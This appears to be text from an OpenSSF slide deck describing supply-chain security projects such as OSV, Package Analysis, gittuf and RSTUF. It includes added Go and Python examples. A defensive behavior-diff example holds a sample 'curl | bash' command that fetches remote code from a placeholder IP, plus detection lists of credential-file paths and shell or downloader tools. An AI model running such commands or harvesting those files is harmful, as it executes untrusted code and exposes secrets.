- Easily Maintain Apps While Disconnected
  - Reduces the skills and resources needed to manage and update applications in disconnected environments, ensuring no downtime or data loss when updating software.

Zarf: Features

- Automate Kubernetes deployments in disconnected environments
- Automate Software Bill of Materials (SBOM) generation
- Build and publish packages as OCI image artifacts
- Provide a web dashboard for viewing SBOM output
- Create and verify package signatures with cosign
- Publish, pull, and deploy packages from an OCI registry
- Powerful component lifecycle actions
- Deploy a new cluster while fully disconnected with K3s, or into any existing cluster using a kubeconfig
- Built-in Git server with Gitea
- Built-in Docker registry
- Built-in K9s dashboard for managing a cluster from the terminal
- Mutating webhook to automatically update Kubernetes pods' image paths and pull secrets, as well as Flux GitRepository URLs and secret references
- Built-in command to find images and resources from a Helm chart
- Tunneling capability to connect to Kubernetes resources without network routing, DNS, TLS or Ingress configuration required
Zarf: Get Involved

- Website: https://zarf.dev/
- GitHub: https://github.com/zarf-dev/zarf
- Slack: #zarf
gittuf

A security layer for Git using concepts introduced by The Update Framework (TUF)

gittuf provides a security layer for Git using some concepts introduced by The Update Framework (TUF). Among other features, gittuf handles key management for all developers on the repository, allows you to set permissions for repository branches, tags, files, etc., protects against other attacks Git is vulnerable to, and more, all while being backwards compatible with GitHub, GitLab, etc.

gittuf is a sandbox project at OpenSSF as part of the Supply Chain Integrity Working Group.
gittuf: Features

- Root of Trust
  - gittuf uses TUF semantics to establish a root of trust for a Git repository
- Key Distribution and Revocation
  - gittuf allows repository owners to declare and distribute the public keys required to verify Git commit and tag signatures
- Permissions
  - gittuf builds on the improved key distribution and revocation mechanisms by leveraging Git's commit and tag signing to define access control policies
  - Repository owners can define rules such as the set of developers authorized to make changes to a branch or create a tag
  - Repository owners can also create policies that dictate which users can make changes to specific files in the repository

gittuf: Goals

While developing gittuf, we have the following goals.

Unopinionated / Agnostic

gittuf provides features to implement different policies without requiring the use of specific systems or tools. For example, gittuf supports a variety of signing mechanisms such as GPG keys and Sigstore's gitsign.

Compatible

gittuf is designed with great care to be compatible with standard Git repositories. All additional artifacts are stored in Git's object store in a gittuf-specific namespace. These artifacts are not visible in the "main" contents of a repository, and therefore do not create any clutter.

gittuf: Get Involved

Website: https://gittuf.dev/
GitHub: https://github.com/gittuf/gittuf
Slack: #gittuf

Working Group: Supply Chain Integrity
Open Source Vulnerability Schema (OSV Schema)

Better vulnerability triage for open source

OSV Schema defines a standard interchange format for describing vulnerabilities in open source packages.

We hope to define a simple format that all vulnerability databases can export, to make it easier for users, security researchers, and any other efforts to consume all available databases. Use of this format would also make it easier for the databases themselves to share or cross-check information. Ultimately, this format aims to enable automated, accurate, and distributed management of vulnerabilities in open source dependencies.
Schema overview:

  {
    "schema_version": string,
    "id": string,
    "modified": string,
    "published": string,
    "withdrawn": string,
    "aliases": [ string ],
    "related": [ string ],
    "summary": string,
    "details": string,
    "severity": [ {
      "type": string,
      "score": string
    } ],
    "affected": [ {
      "package": {
        "ecosystem": string,
        "name": string,
        "purl": string
      },
      "severity": [ {
        "type": string,
        "score": string
      } ],
      "ranges": [ {
        "type": string,
        "repo": string,
        "events": [ {
          "introduced": string,
          "fixed": string,
          "last_affected": string,
          "limit": string
        } ],
        "database_specific": { see description }
      } ],
      "versions": [ string ],
      "ecosystem_specific": { see description },
      "database_specific": { see description }
    } ],
    "references": [ {
      "type": string,
      "url": string
    } ],
    "credits": [ {
      "name": string,
      "contact": [ string ],
      "type": string
    } ],
    "database_specific": { see description }
  }
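The part of the schema a consumer actually has to interpret is affected[].ranges[].events: "introduced" opens an affected interval (the value "0" means from the first version), "fixed" closes it at that version, and "last_affected" closes it just after that version. The following is an added example (not OSV's or osv-scanner's code) that parses a constructed OSV entry and answers "is this package version affected?" for SEMVER ranges and explicit version lists. The version comparison is a simplified dotted-numeric compare that ignores pre-release tags, which a real client would replace with a SemVer library; ECOSYSTEM ranges need the ecosystem's own ordering and GIT ranges need commit ancestry, so both are reported as undecidable rather than guessed. The entry id, package and versions are placeholders.

```go
package main

import (
	"encoding/json"
	"fmt"
	"strconv"
	"strings"
)

// The subset of the OSV schema needed to decide whether a version is affected.
type Entry struct {
	ID       string     `json:"id"`
	Affected []Affected `json:"affected"`
}

type Affected struct {
	Package struct {
		Ecosystem string `json:"ecosystem"`
		Name      string `json:"name"`
	} `json:"package"`
	Ranges   []Range  `json:"ranges"`
	Versions []string `json:"versions"`
}

type Range struct {
	Type   string  `json:"type"` // SEMVER, ECOSYSTEM or GIT
	Events []Event `json:"events"`
}

// Exactly one field is set per event.
type Event struct {
	Introduced   string `json:"introduced,omitempty"`
	Fixed        string `json:"fixed,omitempty"`
	LastAffected string `json:"last_affected,omitempty"`
}

// compareSemver orders "major.minor.patch" numerically. Pre-release and build
// metadata are dropped, a simplification of SemVer 2.0 ordering.
func compareSemver(a, b string) int {
	pa := strings.Split(strings.SplitN(a, "-", 2)[0], ".")
	pb := strings.Split(strings.SplitN(b, "-", 2)[0], ".")
	for i := 0; i < 3; i++ {
		var x, y int
		if i < len(pa) {
			x, _ = strconv.Atoi(pa[i])
		}
		if i < len(pb) {
			y, _ = strconv.Atoi(pb[i])
		}
		if x != y {
			if x < y {
				return -1
			}
			return 1
		}
	}
	return 0
}

// rangeAffects walks the events in order, opening an interval at each
// "introduced" and closing it at "fixed" (exclusive) or "last_affected"
// (inclusive). It assumes events are in ascending version order, as databases
// publish them; a defensive client sorts them first.
func rangeAffects(r Range, version string) bool {
	affected := false
	for _, e := range r.Events {
		switch {
		case e.Introduced != "":
			if e.Introduced == "0" || compareSemver(version, e.Introduced) >= 0 {
				affected = true
			}
		case e.Fixed != "":
			if compareSemver(version, e.Fixed) >= 0 {
				affected = false
			}
		case e.LastAffected != "":
			if compareSemver(version, e.LastAffected) > 0 {
				affected = false
			}
		}
	}
	return affected
}

// Affects reports whether ecosystem/name@version is covered by the entry.
func Affects(e Entry, ecosystem, name, version string) (bool, error) {
	for _, a := range e.Affected {
		if a.Package.Ecosystem != ecosystem || a.Package.Name != name {
			continue
		}
		for _, v := range a.Versions {
			if v == version {
				return true, nil
			}
		}
		for _, r := range a.Ranges {
			if r.Type != "SEMVER" {
				return false, fmt.Errorf("%s: %s range for %s needs ecosystem-specific comparison", e.ID, r.Type, name)
			}
			if rangeAffects(r, version) {
				return true, nil
			}
		}
	}
	return false, nil
}

// sampleEntry is a constructed OSV record with a placeholder id and a fictitious package.
const sampleEntry = `{
  "schema_version": "1.6.0",
  "id": "EXAMPLE-2024-0001",
  "summary": "constructed example: path traversal in widget archive extraction",
  "affected": [{
    "package": {"ecosystem": "Go", "name": "example.com/widget"},
    "ranges": [{"type": "SEMVER", "events": [
      {"introduced": "0"}, {"fixed": "1.2.5"},
      {"introduced": "2.0.0"}, {"fixed": "2.0.3"}
    ]}]
  }]
}`

func main() {
	var e Entry
	if err := json.Unmarshal([]byte(sampleEntry), &e); err != nil {
		panic(err)
	}
	for _, v := range []string{"1.0.0", "1.2.5", "1.9.0", "2.0.1", "2.0.3"} {
		hit, err := Affects(e, "Go", "example.com/widget", v)
		fmt.Printf("%-6s affected=%v err=%v\n", v, hit, err)
	}
}
```

The two-interval sample is the case that trips up naive "version < fixed" logic: 1.9.0 is safe because the first fix landed in 1.2.5, while 2.0.1 is vulnerable again because the bug was reintroduced in the 2.0 line.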
OSV: Use Cases

- Open source consumers: by querying OSV.dev's API and using the tooling to find known vulnerabilities in their dependencies.
- Vulnerability database producers: by making the database available in the OSV format.

OSV consists of:

1. The OSV Schema: an easy-to-use data format that maps precisely to open source versioning schemes.
2. Reference infrastructure (OSV.dev website, API, and tooling) that aggregates, enriches and indexes vulnerability data from databases that use the OSV schema.
3. OSV-Scanner, the officially supported frontend for OSV.dev
OSV: How it Works

OSV enables developers to identify known third-party open source dependency vulnerabilities that pose genuine risk to their application and its environment, so they can focus remediation efforts on the vulnerabilities that matter and sustainably manage vulnerabilities that do not affect them.

The OSV repository contains the infrastructure code that serves osv.dev (including the API). This infrastructure serves as an aggregator of vulnerability databases that have adopted the OpenSSF Vulnerability format.

osv.dev additionally provides infrastructure to ensure affected versions are accurately represented in each vulnerability entry, through bisection and version analysis.
[Figure: the OSV.dev pipeline]

1. Aggregate vulnerability data from sources using https://ossf.github.io/osv-schema
2. Compute precise affected commit ranges and versions affected (with an optional bisect against the source repository)
3. Clients query OSV.dev for known vulnerabilities by version number (package repository) or commit hash (source)
OSV Schema: Get Involved

Website: https://ossf.github.io/osv-schema/
GitHub: https://github.com/ossf/osv-schema
Slack: #osv_schema

Working Group: Vulnerability Disclosures
Package Analysis

Improving the security of open source software by detecting malicious behavior
Package Analysis


The project looks for behaviors in packages available on open source repositories that 
indicate malicious software: 


e What files do they access? 
e What addresses do they connect to? 
e What commands do they run? 


The project also tracks changes in how packages behave over time, to identify when 
previously safe software begins acting suspiciously. 


This effort is meant to improve the security of open source software by detecting 
malicious behavior, informing consumers selecting packages, and providing 
researchers with data about the ecosystem. 
Package Analysis: How it Works

The project's components are:

- A scheduler: creates jobs for the analysis worker from Package Feeds.
- Analysis (one-shot analyze and worker): collects package behavior data through static and dynamic analysis of each package.
- A loader: pushes the analysis results into BigQuery.

The goal is for all of these components to work together and provide extensible, community-run infrastructure to study the behavior of open source packages and to look for malicious software. We also hope that the components can be used independently, to provide package feeds or runtime behavior data for anyone interested.
Package Analysis: Pipeline

[Figure: package repositories -> scheduler -> analysis workers (sandboxed) -> cloud storage -> BigQuery]

1. Package repositories are monitored for new packages.
2. Each new package is scheduled to be analyzed by a pool of workers.
3. A worker performs dynamic analysis of the package inside a sandbox.
4. Results are stored and imported into BigQuery for inspection.

This data is available in the public BigQuery dataset.
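What the pipeline stores per package version is the answer to the three questions from the previous slides (files accessed, addresses connected to, commands run), and the project's "changes over time" angle means the useful signal is the difference between one version and the next. The following is an added example (not the project's analyzer, which runs in a sandbox and writes to BigQuery) that diffs constructed behavior records for two versions of a fictitious npm package and flags the newly appeared behaviours against a few hypothetical heuristics: reads of credential stores, connections to hosts other than the expected registries, and spawning of downloaders or shells. The paths, hosts (203.0.113.7 is a documentation address) and commands are invented.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
)

// Behavior is a constructed summary of what dynamic analysis observed for one
// package version: the three questions the project asks.
type Behavior struct {
	Version  string
	Files    []string // paths read or written
	Hosts    []string // remote addresses connected to
	Commands []string // processes spawned
}

// Indicator is one suspicious observation with a short reason.
type Indicator struct {
	Kind, Value, Reason string
}

// expectedHosts: registries an install legitimately talks to (hypothetical list).
var expectedHosts = map[string]bool{"registry.npmjs.org": true, "pypi.org": true, "files.pythonhosted.org": true}

// Heuristics matching the common malicious-package tradecraft in public reports:
// credential harvesting, exfiltration to an unexpected host, dropping a second stage.
var secretPaths = []string{"/.npmrc", "/.pypirc", "/.aws/credentials", "/.ssh/", "/.docker/config.json", "/.git-credentials"}
var stagerCommands = []string{"curl ", "wget ", "bash -c", "sh -c", "powershell", "base64 -d", "nc "}

// newItems returns the entries of cur that were not present in old.
func newItems(old, cur []string) []string {
	seen := make(map[string]bool, len(old))
	for _, o := range old {
		seen[o] = true
	}
	var out []string
	for _, c := range cur {
		if !seen[c] {
			out = append(out, c)
		}
	}
	return out
}

// Diff returns indicators for behaviour that appeared in cur but not in prev.
// Comparing against the previous version is the point: a package that has
// always phoned home is a policy question, one that starts doing so in a patch
// release looks like a hijacked maintainer account or build.
func Diff(prev, cur Behavior) []Indicator {
	var ind []Indicator
	for _, f := range newItems(prev.Files, cur.Files) {
		for _, s := range secretPaths {
			if strings.Contains(f, s) {
				ind = append(ind, Indicator{"file", f, "reads a credential store"})
				break
			}
		}
	}
	for _, h := range newItems(prev.Hosts, cur.Hosts) {
		if !expectedHosts[h] {
			ind = append(ind, Indicator{"network", h, "new connection to a non-registry host"})
		}
	}
	for _, c := range newItems(prev.Commands, cur.Commands) {
		for _, s := range stagerCommands {
			if strings.Contains(c, s) {
				ind = append(ind, Indicator{"command", c, "spawns a downloader or shell"})
				break
			}
		}
	}
	sort.Slice(ind, func(i, j int) bool { return ind[i].Kind+ind[i].Value < ind[j].Kind+ind[j].Value })
	return ind
}

func main() {
	// Constructed observations for two versions of a fictitious npm package.
	v1 := Behavior{Version: "1.4.0",
		Files:    []string{"/app/node_modules/widget/package.json", "/app/node_modules/widget/index.js"},
		Hosts:    []string{"registry.npmjs.org"},
		Commands: []string{"node -e require('widget')"},
	}
	v2 := Behavior{Version: "1.4.1",
		Files:    append(v1.Files, "/root/.npmrc", "/root/.aws/credentials"),
		Hosts:    append(v1.Hosts, "203.0.113.7"),
		Commands: append(v1.Commands, "sh -c \"curl -s http://203.0.113.7/s | bash\""),
	}
	fmt.Printf("%s -> %s\n", v1.Version, v2.Version)
	for _, i := range Diff(v1, v2) {
		fmt.Printf("  %-8s %-45s %s\n", i.Kind, i.Value, i.Reason)
	}
}
```

The same diff run against the Malicious Packages reports (which are in OSV format) is how a consumer can turn the public dataset into a block list rather than an after-the-fact read.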


Package Analysis: Sub-projects

- Package Feeds: https://github.com/ossf/package-feeds
  - The binary produced by cmd/scheduled-feed/main.go can be used to monitor various package repositories for changes and publish data to external services for further processing.
  - Feeds watch package registries (PyPI, NPM, etc.) for changes to packages and make that data available via a single standard interface.
  - Publisher provides the functionality to push package details from feeds towards external services such as GCP Pub/Sub. Package details are formatted in line with a versioned JSON schema.
- Malicious Packages: https://github.com/ossf/malicious-packages
  - A collection of reports of malicious packages identified in open source package repositories, consumable via the Open Source Vulnerability (OSV) format.
  - The aim of this project and repository is to be a comprehensive, high quality, open source database of reports of malicious packages published on open source package repositories.
  - These public reports help protect the open source community, and provide a data source for the security community to improve their ability to find and detect new open source malware.
Package Analysis: Get Involved


• GitHub: https://github.com/ossf/package-analysis
• Slack: #package-analysis
• Working Group: Securing Critical Projects
Repository Service for TUF (RSTUF)


Better vulnerability triage for open source 




RSTUF 


Repository Service for TUF (RSTUF) is a collection of 
components that provide services for securing content 
downloads from tampering between the repository and the 
client (for example, by an on-path attacker). 


RSTUF security properties are achieved by implementing 
The Update Framework (TUF) as a service. 


Repository Service for TUF is platform, artifact, language, 
and process-flow agnostic. 
RSTUF: Use Cases


Some RSTUF use case examples include but are not limited to: 


An organization has a live "Software Updater". This "Software Updater" uses TUF to
download, install and update software artifacts.

An organization distributes documents. The reader uses TUF to fetch documents 
submitted by a trusted source. 

An organization owns a private container image registry and uses TUF in the CI/CD to 
deploy computing trusted images at the edge. 

An organization with many Operational Technology (OT) devices in different plants uses 
TUF clients to fetch firmware, software, and projects from a distributed artifact 
repository. 

A web portal, which uses TUF to list all artifacts from a content repository and render them as a
web UI, from which the user downloads using a web browser.
RSTUF: Design/Solution


• Simplifies the adoption of TUF by removing the need to
design a repository integration — RSTUF encapsulates
that design.

• Designed to be integrated with existing content delivery
solutions — at the edge or in public/private clouds —
alongside current artifact production systems, such as
build systems.

• Protects downloading, installing, and updating content
from arbitrary content repositories.
RSTUF: API Integrations


If a user wants to integrate RSTUF into an existing CI/CD pipeline the only requirement is to make a REST API 
request to RSTUF: 


[Integration diagram; recoverable labels: Build Systems, Public Repository]
RSTUF: Get Involved


Website: https://repository-service-tuf.readthedocs.io/ 
GitHub: https://github.com/repository-service-tuf 


Slack: #repository-service-for-tuf 
Working Group: Securing Software Repositories 
Secure Supply Chain Consumption Framework (S2C2F)


The S2C2F guide outlines and defines how to securely 
consume OSS dependencies into the developer's 
workflow. 




S2C2F 


The S2C2F is a combination of processes and tools for 
any organization to adopt to help establish a secure OSS 
ingestion process to protect developers from OSS Supply 
Chain threats and to help establish a governance 
program to manage your organization's use of OSS. 
S2C2F: Objective


The objective for the S2C2F Project is to develop and
continuously improve upon a guide that provides the
following:

• A high-level solution-agnostic set of practices

• A detailed list of requirements

• A list of real-world supply chain threats specific to OSS,
and how our Framework requirements mitigate them

• A maturity model-based implementation guide, with
links to tools from across the industry

• A process for assessing your organization's maturity

• A mapping of the Framework requirements to 6 other
supply chain specifications
S2C2F: Core Concepts


The S2C2F is modeled after three core concepts—control all artifact inputs, continuous process 
improvement, and scale. 


[Diagram: the core concepts (control all artifact inputs, continuous process improvement, scale) feeding the goals of the framework for your org]
S2C2F: Get Involved


• GitHub: https://github.com/ossf/s2c2f
• Slack: #s2c2f
• Working Group: Supply Chain Integrity
Best Practices Badge Program


Best practices for Free/Libre and 
Open Source Software 




Best Practices Badge Program 


The Best Practices badge is a way for Free/Libre and 
Open Source Software (FLOSS) projects to show that 
they follow best practices. Projects can voluntarily 
self-certify, at no cost, by using a web application to 
explain how they follow each best practice. The 
OpenSSF Best Practices Badge is inspired by the many 
badges available to projects on GitHub. Consumers of 
the badge can quickly assess which FLOSS projects are 
following best practices and as a result are more likely 
to produce higher-quality secure software. 
Best Practices Badge Program


The OpenSSF Best Practices Badge website outlines the
criteria for the passing badge, provides an example,
shows participating projects, and supports queries to
show projects that have a passing badge. This project
was formerly known as the Core Infrastructure Initiative
(CII) Best Practices Badge and was formally renamed as
part of OpenSSF in late 2021. More information on the
OpenSSF Best Practices Badging program is available on
GitHub.
Best Practices Badge Program


Getting a passing badge is a significant achievement; on average only about 10%
of pursuing projects have a passing badge. We have established two higher
levels beyond passing: silver and gold. Here is a summary of the gold criteria:

• At least 2 unassociated significant contributors
• Per-file copyright and license
• Use 2FA
• At least 50% of all modifications are reviewed by another
• Have a reproducible build
• Use continuous integration
• Statement coverage 90%+
• Branch coverage 80%+
• Support secure protocols & disable insecure protocols by default
• Use TLS version 1.2 or higher
• Have a hardened project website, repo, and download site
• Have a security review (internal or external)
Best Practices Badge Program: Get Involved


Website: https://www.bestpractices.dev 
GitHub: https://github.com/coreinfrastructure/best-practices-badge 


Slack: #wg-best-practices-ossdev 
Working Group: Best Practices for Open Source Developers 


Criticality Score


Defining the influence and 
importance of a project 
Criticality Score


The Criticality Score project computes a criticality score for an open source project.
Goals: 


• Generate a criticality score for every open source project.
• Create a list of critical projects that the open source community depends on.
• Use this data to proactively improve the security posture of these critical projects.


A project's criticality score defines the influence and importance of a project. It is a number between 0
(least-critical) and 1 (most-critical). It is based on the following algorithm by Rob Pike:


C_{\text{project}} = \frac{1}{\sum_i \alpha_i} \sum_i \alpha_i \, \frac{\log(1 + S_i)}{\log(1 + \max(S_i, T_i))}

where S_i is the value of signal i, T_i is the threshold at which signal i saturates, and \alpha_i is the weight of signal i.
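As an added illustration (not code from the Criticality Score project), the formula above implemented so that a practitioner can see how each signal's saturation threshold caps its contribution and which signals drive the final score. The signal names, values and thresholds in SAMPLE_SIGNALS are constructed for the example and are not the project's real parameter table.

```python
import math
from dataclasses import dataclass


@dataclass(frozen=True)
class Signal:
    name: str
    value: float           # S_i: the measured value of signal i
    threshold: float       # T_i: the value at which signal i saturates
    weight: float = 1.0    # alpha_i: the weight of signal i in the average


def signal_term(value: float, threshold: float) -> float:
    """log(1 + S_i) / log(1 + max(S_i, T_i)); always lands in [0, 1]."""
    value = max(value, 0.0)                   # negative counts are treated as zero
    denominator = math.log1p(max(value, threshold))
    if denominator == 0.0:                    # S_i == T_i == 0: nothing measured
        return 0.0
    return math.log1p(value) / denominator    # == 1.0 once S_i >= T_i


def criticality_score(signals) -> float:
    """Weighted average of the per-signal terms: C_project in [0, 1]."""
    total_weight = sum(s.weight for s in signals)
    if total_weight <= 0.0:
        raise ValueError("signal weights must sum to a positive number")
    weighted = sum(s.weight * signal_term(s.value, s.threshold) for s in signals)
    return weighted / total_weight


def signal_breakdown(signals) -> dict:
    """Each signal's share of the final score, to see what drives it."""
    total_weight = sum(s.weight for s in signals)
    return {s.name: s.weight * signal_term(s.value, s.threshold) / total_weight
            for s in signals}


# Constructed sample signals (illustrative names, values and thresholds only).
SAMPLE_SIGNALS = [
    Signal("created_since_months", 48, 120, 1.0),
    Signal("contributor_count", 350, 5000, 2.0),
    Signal("commit_frequency_per_week", 12, 1000, 1.0),
    Signal("dependents_count", 20000, 500000, 2.0),
]

if __name__ == "__main__":
    for name, share in signal_breakdown(SAMPLE_SIGNALS).items():
        print(f"{name:28s} {share:.3f}")
    print(f"C_project = {criticality_score(SAMPLE_SIGNALS):.3f}")
```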
Criticality Score: Get Involved


• GitHub: https://github.com/ossf/criticality_score
• Working Group: Securing Critical Projects
Improving the fuzzing experience of a project
Fuzz Introspector


Fuzz Introspector is a tool to help fuzzer developers get an understanding of their
fuzzer's performance and identify any potential blockers. Fuzz Introspector aggregates
the fuzzers' functional data, such as coverage, hit frequency and entry points, to give the
developer a bird's-eye view of their fuzzer. This helps with identifying fuzz bottlenecks
and blockers and eventually helps in developing better fuzzers.


Fuzz Introspector aims to improve the fuzzing experience of a project by guiding you on
whether you should:

• introduce new fuzzers to a fuzz harness
• modify existing fuzzers to improve the quality of your harness.
Indexing OSS-Fuzz Projects


Open Source Fuzzing Introspection provides introspection capabilities to OSS-Fuzz 
projects and is powered by Fuzz Introspector. 


• Table of projects with Fuzz Introspector analysis

• Examples, with links in profile to latest Fuzz Introspector analysis:
  ◦ Liblouis / C
  ◦ htslib / C
  ◦ brotli / C++
  ◦ idna / python
  ◦ junrar / java
Fuzz Introspector: Architecture


[Architecture diagram, left to right:
Fuzzing harness (Fuzzer 1, Fuzzer 2, Fuzzer 3; source code in .c/.cpp; build.sh for each driver)
→ Compilation-based static analysis: compiler-based analysis by way of LLVM using link time optimisation (LTO): control-flow graph extraction, data about each function in module
→ Post-processing: core analyses, data processing, dynamic analysis using coverage reports
→ Reports for each driver (HTML report)]
Fuzz Introspector: Get Involved


• GitHub: https://github.com/ossf/fuzz-introspector
• Working Group: Security Tooling
Security Insights Specification


Machine-processable project 
security information reporting 
Security Insights Specification


This specification provides a mechanism for projects to report information about their 
security in a machine-processable way. It is formatted as a YAML file to make it easy to 
read and edit by humans. 


The data tracked within this specification is intended to fill the gaps between simplified
solutions such as SECURITY.md and comprehensive automatable solutions such as
SBOMs. In that gap lie elements that must be self-reported by projects to allow
end-users to make informed security decisions.


As the adoption of Security Insights grows, so does the opportunity to automatically 
ingest it. For example, the Linux Foundation's CLOMonitor parses a project's Security 
Insights file to determine whether projects have reported on select security factors 
prioritized by the foundation. 
Security Insights Specification: Get Involved


• GitHub: https://github.com/ossf/security-insights-spec
• Slack: #security-insights
• Working Group: Identifying Security Threats in Open Source Projects
bomctl


Bridging the gap between SBOM generation 
and SBOM analysis tools. 
bomctl


bomctl is format-agnostic Software Bill of Materials 
(SBOM) tooling, which is intended to bridge the gap 
between SBOM generation and SBOM analysis tools. It 
focuses on supporting more complex SBOM operations 
by being opinionated on only supporting the NTIA 
minimum fields or other fields supported by protobom. 


It is intended to help developers who need to manipulate
SBOMs at the CLI or within a workflow. An example
operation would be merging in project-specific SBOM
data that would not be detected by an SBOM generation
tool.
bomctl: Goals


• Simplify the process of manipulating SBOM files
while being SBOM format agnostic

• Simplify linking SBOM files to allow "trees" of
SBOM files to handle capturing systems of systems

• Manage reading SBOM files from a variety of
sources

• Manage writing SBOM files to a variety of
destinations

• Create a CLI to wrap protobom Go library
functionality
bomctl: Features


• Work with multiple SBOMs in tree structures
(through external references)
• Fetch and push SBOMs using multiple protocols
• Leverage a .netrc file to handle authentication
• Manage SBOMs using a persistent database cache
• FUTURE - Manipulate SBOMs with commands like
diff, split, and redact
• FUTURE - Interface with OpenSSF projects and
services like GUAC and Sigstore
bomctl: Get Involved


• GitHub: https://github.com/bomctl
• Slack: #bomctl
• Working Group: Security Tooling
Is your organization a member of OpenSSF?


Questions? Contact membership@openssf.or 